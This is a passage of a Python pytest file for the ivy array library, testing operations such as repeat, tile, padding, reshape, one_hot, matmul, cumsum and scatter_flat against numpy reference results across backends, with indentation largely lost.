        # mxnet only supports repeats defined as an int
ret = ivy.repeat(x, reps_raw, axis)
else:
ret = ivy.repeat(x, reps, axis)
# type test
assert ivy.is_array(ret)
# cardinality test
if x.shape == ():
expected_shape = [reps_raw] if isinstance(reps_raw, int) else list(reps_raw)
else:
axis_wrapped = axis % len(x_shape)
expected_shape = x_shape[0:axis_wrapped] + [sum(reps_raw)] + x_shape[axis_wrapped+1:]
assert list(ret.shape) == expected_shape
# value test
if call is helpers.mx_call:
        # mxnet only supports repeats defined as an int
assert np.allclose(call(ivy.repeat, x, reps_raw, axis),
np.asarray(ivy.functional.backends.numpy.repeat(ivy.to_numpy(x), ivy.to_numpy(reps), axis)))
else:
assert np.allclose(call(ivy.repeat, x, reps, axis),
np.asarray(ivy.functional.backends.numpy.repeat(ivy.to_numpy(x), ivy.to_numpy(reps), axis)))
# compilation test
if call in [helpers.torch_call]:
        # pytorch scripting does not support unions of types
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.repeat)
# tile
@pytest.mark.parametrize(
"x_n_reps", [(1, [1]), (1, 2), (1, [2]), ([[0., 1., 2., 3.]], (2, 1))])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_tile(x_n_reps, dtype, tensor_fn, dev, call):
# smoke test
x, reps_raw = x_n_reps
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret_from_list = ivy.tile(x, reps_raw)
reps = ivy.array(reps_raw, 'int32', dev)
ret = ivy.tile(x, reps)
# type test
assert ivy.is_array(ret)
# cardinality test
if x.shape == ():
expected_shape = tuple(reps_raw) if isinstance(reps_raw, list) else (reps_raw,)
else:
expected_shape = tuple([int(item * rep) for item, rep in zip(x.shape, reps_raw)])
assert ret.shape == expected_shape
# value test
assert np.allclose(call(ivy.tile, x, reps),
np.asarray(ivy.functional.backends.numpy.tile(ivy.to_numpy(x), ivy.to_numpy(reps))))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support numpy conversion
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.tile)
# zero_pad
@pytest.mark.parametrize(
"x_n_pw", [(1, [[1, 1]]), (1, [[0, 0]]), ([[0., 1., 2., 3.]], [[0, 1], [1, 2]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_zero_pad(x_n_pw, dtype, tensor_fn, dev, call):
# smoke test
x, pw_raw = x_n_pw
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret_from_list = ivy.zero_pad(x, pw_raw)
pw = ivy.array(pw_raw, 'int32', dev)
ret = ivy.zero_pad(x, pw)
# type test
assert ivy.is_array(ret)
# cardinality test
x_shape = [1] if x.shape == () else x.shape
expected_shape = tuple([int(item + pw_[0] + pw_[1]) for item, pw_ in zip(x_shape, pw_raw)])
assert ret.shape == expected_shape
# value test
assert np.allclose(call(ivy.zero_pad, x, pw), ivy.functional.backends.numpy.zero_pad(ivy.to_numpy(x), ivy.to_numpy(pw)))
# compilation test
if call is helpers.torch_call:
# pytorch scripting does not support Union or Numbers for type hinting
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.zero_pad)
# fourier_encode
@pytest.mark.parametrize(
"x_n_mf_n_nb_n_gt", [([2.], 4., 4, [[2.0000000e+00, 1.7484555e-07, 9.9805772e-01,-5.2196848e-01,
3.4969111e-07, 1.0000000e+00, -6.2295943e-02, -8.5296476e-01, 1.0000000e+00]]),
([[1., 2.], [3., 4.], [5., 6.]], [2., 4.], 4,
[[[1.0000000e+00, -8.7422777e-08, -8.7422777e-08, -8.7422777e-08,
-8.7422777e-08, -1.0000000e+00, -1.0000000e+00, -1.0000000e+00,
-1.0000000e+00],
[2.0000000e+00, 1.7484555e-07, 9.9805772e-01, -5.2196848e-01,
-6.0398321e-07, 1.0000000e+00, -6.2295943e-02, -8.5296476e-01,
1.0000000e+00]],
[[3.0000000e+00, -2.3849761e-08, -2.3849761e-08, -2.3849761e-08,
-2.3849761e-08, -1.0000000e+00, -1.0000000e+00, -1.0000000e+00,
-1.0000000e+00],
[4.0000000e+00, 3.4969111e-07, -1.2434989e-01, 8.9044148e-01,
-1.2079664e-06, 1.0000000e+00, -9.9223840e-01, 4.5509776e-01,
1.0000000e+00]],
[[5.0000000e+00, -6.7553248e-07, -6.7553248e-07, -6.7553248e-07,
-6.7553248e-07, -1.0000000e+00, -1.0000000e+00, -1.0000000e+00,
-1.0000000e+00],
[6.0000000e+00, 4.7699523e-08, -9.8256493e-01, -9.9706185e-01,
-3.7192983e-06, 1.0000000e+00, 1.8591987e-01, 7.6601014e-02,
1.0000000e+00]]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_fourier_encode(x_n_mf_n_nb_n_gt, dtype, tensor_fn, dev, call):
# smoke test
x, max_freq, num_bands, ground_truth = x_n_mf_n_nb_n_gt
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
if isinstance(max_freq, list):
max_freq = tensor_fn(max_freq, dtype, dev)
ret = ivy.fourier_encode(x, max_freq, num_bands)
# type test
assert ivy.is_array(ret)
# cardinality test
x_shape = [1] if x.shape == () else list(x.shape)
expected_shape = x_shape + [1 + 2*num_bands]
assert list(ret.shape) == expected_shape
# value test
assert np.allclose(call(ivy.fourier_encode, x, max_freq, num_bands), np.array(ground_truth), atol=1e-5)
# compilation test
if call is helpers.torch_call:
# pytorch scripting does not support Union or Numbers for type hinting
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.fourier_encode)
# constant_pad
@pytest.mark.parametrize(
"x_n_pw_n_val", [(1, [[1, 1]], 1.5), (1, [[0, 0]], -2.7), ([[0., 1., 2., 3.]], [[0, 1], [1, 2]], 11.)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_constant_pad(x_n_pw_n_val, dtype, tensor_fn, dev, call):
# smoke test
x, pw_raw, val = x_n_pw_n_val
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret_from_list = ivy.constant_pad(x, pw_raw, val)
pw = ivy.array(pw_raw, 'int32', dev)
ret = ivy.constant_pad(x, pw, val)
# type test
assert ivy.is_array(ret)
# cardinality test
x_shape = [1] if x.shape == () else x.shape
expected_shape = tuple([int(item + pw_[0] + pw_[1]) for item, pw_ in zip(x_shape, pw_raw)])
assert ret.shape == expected_shape
# value test
assert np.allclose(call(ivy.constant_pad, x, pw, val),
np.asarray(ivy.functional.backends.numpy.constant_pad(ivy.to_numpy(x), ivy.to_numpy(pw), val)))
# compilation test
if call is helpers.torch_call:
# pytorch scripting does not support Union or Numbers for type hinting
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.constant_pad)
# swapaxes
@pytest.mark.parametrize(
"x_n_ax0_n_ax1", [([[1.]], 0, 1), ([[0., 1., 2., 3.]], 1, 0), ([[[0., 1., 2.], [3., 4., 5.]]], -2, -1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_swapaxes(x_n_ax0_n_ax1, dtype, tensor_fn, dev, call):
# smoke test
x, ax0, ax1 = x_n_ax0_n_ax1
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.swapaxes(x, ax0, ax1)
# type test
assert ivy.is_array(ret)
# cardinality test
expected_shape = list(x.shape)
expected_shape[ax0], expected_shape[ax1] = expected_shape[ax1], expected_shape[ax0]
assert ret.shape == tuple(expected_shape)
# value test
assert np.allclose(call(ivy.swapaxes, x, ax0, ax1),
np.asarray(ivy.functional.backends.numpy.swapaxes(ivy.to_numpy(x), ax0, ax1)))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.swapaxes)
# transpose
@pytest.mark.parametrize(
"x_n_axes", [([[1.]], [1, 0]), ([[0., 1., 2., 3.]], [1, 0]), ([[[0., 1., 2.], [3., 4., 5.]]], [0, 2, 1])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_transpose(x_n_axes, dtype, tensor_fn, dev, call):
# smoke test
x, axes = x_n_axes
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.transpose(x, axes)
# type test
assert ivy.is_array(ret)
# cardinality test
x_shape = x.shape
assert ret.shape == tuple([x.shape[idx] for idx in axes])
# value test
assert np.allclose(call(ivy.transpose, x, axes), np.asarray(ivy.functional.backends.numpy.transpose(ivy.to_numpy(x), axes)))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.transpose)
# expand_dims
@pytest.mark.parametrize(
"x_n_axis", [(1., 0), (1., -1), ([1.], 0), ([[0., 1., 2., 3.]], -2), ([[[0., 1., 2.], [3., 4., 5.]]], -3)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_expand_dims(x_n_axis, dtype, tensor_fn, dev, call):
# smoke test
x, axis = x_n_axis
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.expand_dims(x, axis)
# type test
assert ivy.is_array(ret)
# cardinality test
expected_shape = list(x.shape)
expected_shape.insert(axis, 1)
assert ret.shape == tuple(expected_shape)
# value test
assert np.allclose(call(ivy.expand_dims, x, axis), np.asarray(ivy.functional.backends.numpy.expand_dims(ivy.to_numpy(x), axis)))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.expand_dims)
# where
@pytest.mark.parametrize(
"cond_n_x1_n_x2", [(True, 2., 3.), (0., 2., 3.), ([True], [2.], [3.]), ([[0.]], [[2., 3.]], [[4., 5.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_where(cond_n_x1_n_x2, dtype, tensor_fn, dev, call):
# smoke test
cond, x1, x2 = cond_n_x1_n_x2
if (isinstance(cond, Number) or isinstance(x1, Number) or isinstance(x2, Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
cond = tensor_fn(cond, dtype, dev)
x1 = tensor_fn(x1, dtype, dev)
x2 = tensor_fn(x2, dtype, dev)
ret = ivy.where(cond, x1, x2)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x1.shape
# value test
assert np.allclose(call(ivy.where, cond, x1, x2),
np.asarray(ivy.functional.backends.numpy.where(ivy.to_numpy(cond), ivy.to_numpy(x1), ivy.to_numpy(x2))))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support .type() method
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.where)
# indices_where
@pytest.mark.parametrize(
"x", [[True], [[0., 1.], [2., 3.]]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_indices_where(x, dtype, tensor_fn, dev, call):
# smoke test
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.indices_where(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert len(ret.shape) == 2
assert ret.shape[-1] == len(x.shape)
# value test
assert np.allclose(call(ivy.indices_where, x), np.asarray(ivy.functional.backends.numpy.indices_where(ivy.to_numpy(x))))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.indices_where)
# isnan
@pytest.mark.parametrize(
"x_n_res", [([True], [False]),
([[0., float('nan')], [float('nan'), 3.]],
[[False, True], [True, False]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_isnan(x_n_res, dtype, tensor_fn, dev, call):
x, res = x_n_res
# smoke test
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.isnan(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.isnan, x), res)
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.isnan)
# isinf
@pytest.mark.parametrize(
"x_n_res", [([True], [False]),
([[0., float('inf')], [float('nan'), -float('inf')]],
[[False, True], [False, True]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_isinf(x_n_res, dtype, tensor_fn, dev, call):
x, res = x_n_res
# smoke test
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.isinf(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.isinf, x), res)
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.isinf)
# isfinite
@pytest.mark.parametrize(
"x_n_res", [([True], [True]),
([[0., float('inf')], [float('nan'), 3.]],
[[True, False], [False, True]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_isfinite(x_n_res, dtype, tensor_fn, dev, call):
x, res = x_n_res
# smoke test
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.isfinite(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.isfinite, x), res)
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.isfinite)
# reshape
@pytest.mark.parametrize(
"x_n_shp", [(1., (1, 1)), (1., 1), (1., []), ([[1.]], []), ([[0., 1.], [2., 3.]], (1, 4, 1))])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_reshape(x_n_shp, dtype, tensor_fn, dev, call):
# smoke test
x, new_shape = x_n_shp
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.reshape(x, new_shape)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == ((new_shape,) if isinstance(new_shape, int) else tuple(new_shape))
# value test
assert np.allclose(call(ivy.reshape, x, new_shape), np.asarray(ivy.functional.backends.numpy.reshape(ivy.to_numpy(x), new_shape)))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.reshape)
# broadcast_to
@pytest.mark.parametrize(
"x_n_shp", [([1.], (2, 1)), ([[0., 1.], [2., 3.]], (10, 2, 2))])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_broadcast_to(x_n_shp, dtype, tensor_fn, dev, call):
# smoke test
x, new_shape = x_n_shp
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.broadcast_to(x, new_shape)
# type test
assert ivy.is_array(ret)
# cardinality test
assert len(ret.shape) == len(new_shape)
# value test
assert np.allclose(call(ivy.broadcast_to, x, new_shape),
np.asarray(ivy.functional.backends.numpy.broadcast_to(ivy.to_numpy(x), new_shape)))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.broadcast_to)
# squeeze
@pytest.mark.parametrize(
"x_n_axis", [(1., 0), (1., -1), ([[1.]], None), ([[[0.], [1.]], [[2.], [3.]]], -1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_squeeze(x_n_axis, dtype, tensor_fn, dev, call):
# smoke test
x, axis = x_n_axis
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.squeeze(x, axis)
# type test
assert ivy.is_array(ret)
# cardinality test
if axis is None:
expected_shape = [item for item in x.shape if item != 1]
elif x.shape == ():
expected_shape = []
else:
expected_shape = list(x.shape)
expected_shape.pop(axis)
assert ret.shape == tuple(expected_shape)
# value test
assert np.allclose(call(ivy.squeeze, x, axis), np.asarray(ivy.functional.backends.numpy.squeeze(ivy.to_numpy(x), axis)))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.squeeze)
# zeros
@pytest.mark.parametrize(
"shape", [(), (1, 2, 3), tuple([1]*10)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_zeros(shape, dtype, tensor_fn, dev, call):
# smoke test
ret = ivy.zeros(shape, dtype, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == tuple(shape)
# value test
assert np.allclose(call(ivy.zeros, shape, dtype, dev), np.asarray(ivy.functional.backends.numpy.zeros(shape, dtype)))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting cannot assign a torch.device value with a string
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.zeros)
# docstring test
helpers.assert_docstring_examples_run(ivy.zeros)
# zeros_like
@pytest.mark.parametrize(
"x", [1, [1], [[1], [2], [3]]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_zeros_like(x, dtype, tensor_fn, dev, call):
# smoke test
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.zeros_like(x, dtype, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.zeros_like, x, dtype, dev),
np.asarray(ivy.functional.backends.numpy.zeros_like(ivy.to_numpy(x), dtype)))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting cannot assign a torch.device value with a string
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.zeros_like)
# ones
@pytest.mark.parametrize(
"shape", [(), (1, 2, 3), tuple([1]*10)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_ones(shape, dtype, tensor_fn, dev, call):
# smoke test
ret = ivy.ones(shape, dtype, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == tuple(shape)
# value test
assert np.allclose(call(ivy.ones, shape, dtype, dev), np.asarray(ivy.functional.backends.numpy.ones(shape, dtype)))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting cannot assign a torch.device value with a string
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.ones)
# ones_like
@pytest.mark.parametrize(
"x", [1, [1], [[1], [2], [3]]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_ones_like(x, dtype, tensor_fn, dev, call):
# smoke test
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.ones_like(x, dtype, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.ones_like, x, dtype, dev),
np.asarray(ivy.functional.backends.numpy.ones_like(ivy.to_numpy(x), dtype)))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting cannot assign a torch.device value with a string
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.ones_like)
# full
@pytest.mark.parametrize(
"shape", [(), (1, 2, 3), tuple([1]*10)])
@pytest.mark.parametrize(
"fill_val", [2., -7.])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_full(shape, fill_val, dtype, tensor_fn, dev, call):
# smoke test
ret = ivy.full(shape, fill_val, dtype, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == tuple(shape)
# value test
assert np.allclose(call(ivy.full, shape, fill_val, dtype, dev),
np.asarray(ivy.functional.backends.numpy.full(shape, fill_val, dtype)))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting cannot assign a torch.device value with a string
return
if not ivy.array_mode():
        helpers.assert_compilable(ivy.full)
# one_hot
@pytest.mark.parametrize(
"ind_n_depth", [([0], 1), ([0, 1, 2], 3), ([[1, 3], [0, 0], [8, 4], [7, 9]], 10)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_one_hot(ind_n_depth, dtype, tensor_fn, dev, call):
# smoke test
ind, depth = ind_n_depth
if isinstance(ind, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
ind = ivy.array(ind, 'int32', dev)
ret = ivy.one_hot(ind, depth, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == ind.shape + (depth,)
# value test
assert np.allclose(call(ivy.one_hot, ind, depth, dev),
np.asarray(ivy.functional.backends.numpy.one_hot(ivy.to_numpy(ind), depth)))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting cannot assign a torch.device value with a string
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.one_hot)
# cross
@pytest.mark.parametrize(
"x1_n_x2", [([0., 1., 2.], [3., 4., 5.]), ([[0., 1., 2.], [2., 1., 0.]], [[3., 4., 5.], [5., 4., 3.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_cross(x1_n_x2, dtype, tensor_fn, dev, call):
# smoke test
x1, x2 = x1_n_x2
if (isinstance(x1, Number) or isinstance(x2, Number)) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x1 = ivy.array(x1, dtype, dev)
x2 = ivy.array(x2, dtype, dev)
ret = ivy.cross(x1, x2)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x1.shape
# value test
assert np.allclose(call(ivy.cross, x1, x2), np.asarray(ivy.functional.backends.numpy.cross(ivy.to_numpy(x1), ivy.to_numpy(x2))))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.cross)
# matmul
@pytest.mark.parametrize(
"x1_n_x2", [([[0., 1., 2.]], [[3.], [4.], [5.]]), ([[0., 1., 2.], [2., 1., 0.]], [[3., 4.], [5., 5.], [4., 3.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_matmul(x1_n_x2, dtype, tensor_fn, dev, call):
# smoke test
x1, x2 = x1_n_x2
if (isinstance(x1, Number) or isinstance(x2, Number)) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x1 = ivy.array(x1, dtype, dev)
x2 = ivy.array(x2, dtype, dev)
ret = ivy.matmul(x1, x2)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x1.shape[:-1] + (x2.shape[-1],)
# value test
assert np.allclose(call(ivy.matmul, x1, x2), np.asarray(ivy.functional.backends.numpy.matmul(ivy.to_numpy(x1), ivy.to_numpy(x2))))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.matmul)
# cumsum
@pytest.mark.parametrize(
"x_n_axis", [([[0., 1., 2.]], -1), ([[0., 1., 2.], [2., 1., 0.]], 0), ([[0., 1., 2.], [2., 1., 0.]], 1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_cumsum(x_n_axis, dtype, tensor_fn, dev, call):
# smoke test
x, axis = x_n_axis
x = ivy.array(x, dtype, dev)
ret = ivy.cumsum(x, axis)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.cumsum, x, axis), np.asarray(ivy.functional.backends.numpy.cumsum(ivy.to_numpy(x), axis)))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.cumsum)
# cumprod
@pytest.mark.parametrize(
"x_n_axis", [([[0., 1., 2.]], -1), ([[0., 1., 2.], [2., 1., 0.]], 0), ([[0., 1., 2.], [2., 1., 0.]], 1)])
@pytest.mark.parametrize(
"exclusive", [True, False])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_cumprod(x_n_axis, exclusive, dtype, tensor_fn, dev, call):
# smoke test
x, axis = x_n_axis
x = ivy.array(x, dtype, dev)
ret = ivy.cumprod(x, axis, exclusive)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.cumprod, x, axis, exclusive),
np.asarray(ivy.functional.backends.numpy.cumprod(ivy.to_numpy(x), axis, exclusive)))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.cumprod)
# identity
@pytest.mark.parametrize(
"dim_n_bs", [(3, None), (1, (2, 3)), (5, (1, 2, 3))])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_identity(dim_n_bs, dtype, tensor_fn, dev, call):
# smoke test
dim, bs = dim_n_bs
ret = ivy.identity(dim, dtype, bs, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == (tuple(bs) if bs else ()) + (dim, dim)
# value test
assert np.allclose(call(ivy.identity, dim, dtype, bs, dev),
np.asarray(ivy.functional.backends.numpy.identity(dim, dtype, bs)))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting cannot assign a torch.device value with a string
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.identity)
# meshgrid
@pytest.mark.parametrize(
"xs", [([1, 2, 3], [4, 5, 6]), ([1, 2, 3], [4, 5, 6, 7], [8, 9])])
@pytest.mark.parametrize(
"indexing", ['xy', 'ij'])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_meshgrid(xs, indexing, dtype, tensor_fn, dev, call):
# smoke test
xs_as_arrays = [ivy.array(x, 'int32', dev) for x in xs]
rets = ivy.meshgrid(*xs_as_arrays, indexing=indexing)
# type test
for ret in rets:
assert ivy.is_array(ret)
# cardinality test
target_shape = tuple([len(x) for x in xs])
if indexing == 'xy':
target_shape = (target_shape[1], target_shape[0]) + target_shape[2:]
for ret in rets:
assert ret.shape == target_shape
# value test
assert np.allclose(
call(ivy.meshgrid, *xs_as_arrays, indexing=indexing),
[np.asarray(i) for i in ivy.functional.backends.numpy.meshgrid(*[ivy.to_numpy(x) for x in xs_as_arrays], indexing=indexing)])
# compilation test
if call is helpers.torch_call:
# torch scripting can't take variable number of arguments or use keyword-only arguments with defaults
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.meshgrid)
# scatter_flat
@pytest.mark.parametrize(
"inds_n_upd_n_size", [([0, 4, 1, 2], [1, 2, 3, 4], 8), ([0, 4, 1, 2, 0], [1, 2, 3, 4, 5], 8)])
@pytest.mark.parametrize(
"red", ['sum', 'min', 'max', 'replace'])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_scatter_flat(inds_n_upd_n_size, red, dtype, tensor_fn, dev, call):
# smoke test
if (red == 'sum' or red == 'min' or red == 'max') and call is helpers.mx_call:
# mxnet does not support sum, min or max reduction for scattering
pytest.skip()
if red == 'replace' and call is not helpers.mx_call:
# mxnet is the only backend which supports the replace reduction
pytest.skip()
inds, upd, size = inds_n_upd_n_size
inds = ivy.array(inds, 'int32', dev)
upd = tensor_fn(upd, dtype, dev)
ret = ivy.scatter_flat(inds, upd, size, red, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == (size,)
if red == 'replace':
return
# value test
assert np.allclose(call(ivy.scatter_flat, inds, upd, size, red, dev),
np.asarray(ivy.functional.backends.numpy.scatter_flat(ivy.to_numpy(inds), ivy.to_numpy(upd), size, red)))
# compilation test
if call in [helpers.torch_call]:
# global torch_scatter var not supported when scripting
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.scatter_flat)
# scatter_nd
@pytest.mark.parametrize(
